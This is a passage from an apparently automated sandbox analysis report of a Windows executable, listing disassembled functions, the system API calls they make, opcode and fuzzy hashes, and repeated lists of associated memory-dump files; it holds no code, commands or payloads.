                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: >2%8$NFFV$]c\"
                                                                        • API String ID: 0-36263332
                                                                        • Opcode ID: 7469cf01f1ae8ab3b4c1da4b8c4111aa1e01987777e351a1184536e134638bee
                                                                        • Instruction ID: 3d3d5b0d72b8324395c35f18b5993a6a6ac9face030c2a34ebd1fe7054def546
                                                                        • Opcode Fuzzy Hash: 7469cf01f1ae8ab3b4c1da4b8c4111aa1e01987777e351a1184536e134638bee
                                                                        • Instruction Fuzzy Hash: 92F114745047828BD7258F2AC4A0762BBE2EFA3300F2C859DC4D68F793D7799806C7A1
                                                                        Function 0060CF90 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 195COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 969 60cf90-60cfaf 970 60cfb0-60cfd3 969->970 970->970 971 60cfd5-60cfdf call 63ff20 970->971 974 60d1c4-60d1cf ExitProcess 971->974 975 60cfe5-60cfec call 638d10 971->975 978 60cff2-60d0a5 975->978 979 60d1bf call 640de0 975->979 982 60d0b0-60d0c2 978->982 979->974 982->982 983 60d0c4-60d0c7 982->983 984 60d19c-60d1a4 983->984 985 60d0cd-60d101 983->985 989 60d1a6-60d1ab 984->989 990 60d1ac-60d1b3 call 60e1a0 984->990 986 60d110-60d12d 985->986 986->986 988 60d12f-60d158 986->988 991 60d160-60d181 988->991 989->990 990->979 996 60d1b5 call 610b90 990->996 991->991 993 60d183-60d196 991->993 993->984 998 60d1ba call 60fa70 996->998 998->979
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(00000000), ref: 0060D1C6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID: 89
                                                                        • API String ID: 621844428-155395596
                                                                        • Opcode ID: 157a97ecf0bfdc992fc3d903675494deded733d9c75caab7033a7bde524971a6
                                                                        • Instruction ID: b610d7bf388e0b1e05b64ff57df0d2fec0c7059d899bba07dadfe09a676bb2f4
                                                                        • Opcode Fuzzy Hash: 157a97ecf0bfdc992fc3d903675494deded733d9c75caab7033a7bde524971a6
                                                                        • Instruction Fuzzy Hash: E9516A7179872017E31CAA748C523BFABC2DF96714F098E2CD9C2EB3C1DD6888054792
                                                                        Function 0061D7F8 Relevance: 1.9, APIs: 1, Instructions: 413COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 804c2754968db1903abf679d93d17b4c71e28c4dfd799bb0b594be1fb06618a1
                                                                        • Instruction ID: 504d62b1bc5c90b33fce322329a1aaa1d3ed5d1169fecb2075b0c78c870476bb
                                                                        • Opcode Fuzzy Hash: 804c2754968db1903abf679d93d17b4c71e28c4dfd799bb0b594be1fb06618a1
                                                                        • Instruction Fuzzy Hash: 90D1F0B5504B418FD724CF28D8817A3B7E3EF45314F188A6CD49A8B796E734E885CB51
                                                                        Function 0061104F Relevance: 1.6, APIs: 1, Instructions: 379COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoUninitialize.COMBASE(?,00000001,00000001,?,?,?,00000001,00000001,00000003,00000001,00000001,?,?,?,00000001,00000001), ref: 00611379
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Uninitialize
                                                                        • String ID:
                                                                        • API String ID: 3861434553-0
                                                                        • Opcode ID: 7984f728dfc28b1921d092c0329c18351f5dd5211f2ab43a03e920c9fd6fc4e7
                                                                        • Instruction ID: ad51527c11e69f85dfa7ef10c3d5cb0c1d84170d9b3d97f41e8b765e59d742fc
                                                                        • Opcode Fuzzy Hash: 7984f728dfc28b1921d092c0329c18351f5dd5211f2ab43a03e920c9fd6fc4e7
                                                                        • Instruction Fuzzy Hash: D2B19EB5B407405BD354AF70ACD2A6B76A3AF86314F08953CE8474B783DF78E805875A
                                                                        Function 0063E210 Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0063E2A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: a97d5c6698ef60cdae8f65a3a10cc2a3dc6d074e63750b167ff8a80e33954c7d
                                                                        • Instruction ID: 4638019295d71190aa056d900161206c8d30358ab5eb817ac4d6503e23d9621c
                                                                        • Opcode Fuzzy Hash: a97d5c6698ef60cdae8f65a3a10cc2a3dc6d074e63750b167ff8a80e33954c7d
                                                                        • Instruction Fuzzy Hash: 6911447BE452508FC3108E68DCA2757BB6BEBDA711F1A057DD8809BA80CA355816CBD1
                                                                        Function 00640F10 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LdrInitializeThunk.NTDLL(006446AD,005C003F,00000006,?,?,00000018,?,?,?), ref: 00640F3E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
